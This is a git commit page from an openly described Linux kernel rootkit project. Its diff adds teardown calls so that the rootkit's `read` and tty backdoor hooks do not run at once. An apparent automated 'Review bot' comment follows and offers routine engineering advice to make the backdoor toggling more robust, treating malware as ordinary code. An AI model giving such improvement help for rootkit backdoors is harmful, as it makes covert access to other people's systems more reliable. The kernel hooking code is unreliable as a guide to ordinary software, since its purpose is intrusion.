linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 932a607b50edceb9c7b1ed3b2bf7a058ce5afe9b
parent f0a63efab028ba18950a0d6829a13bbd6d5427ea
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 30 Nov 2020 01:34:07 +0100

fixes `read` and `tty` simultaneous backdoor issue

Diffstat:
M src/channel.c | 2 ++
1 file changed, 2 insertions(+), 0 deletions(-)

diff --git a/src/channel.c b/src/channel.c @@ -117,10 +117,12 @@ handle_togglebd(unsigned long arg) rootkit.backdoor = BD_OFF; msg = "off"; } else if (sarg < 0) { + unbackdoor(); backdoor_read(); rootkit.backdoor = BD_READ; msg = "hooked into `read`"; } else if (sarg > 0) { + unbackdoor(); backdoor_tty(); rootkit.backdoor = BD_TTY; msg = "hooked into `{p,t}ty`";
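
Review bot: the same `unbackdoor();` call is now repeated in both the `sarg < 0` and `sarg > 0` branches of `handle_togglebd`, and nothing in the hunk says why it has to precede `backdoor_read()` / `backdoor_tty()`. The body of the "off" branch is not visible here; if it performs the same teardown, a single call ahead of the if/else chain would cover all three cases and prevent a future mode from being added without it. A one-line comment stating the invariant (`rootkit.backdoor` names the only hook installed at any time) would document what the commit message calls the simultaneous backdoor issue. As written, requesting the mode that is already active also removes and reinstalls the same hook, so a comparison of the requested mode against `rootkit.backdoor` before the teardown would avoid that.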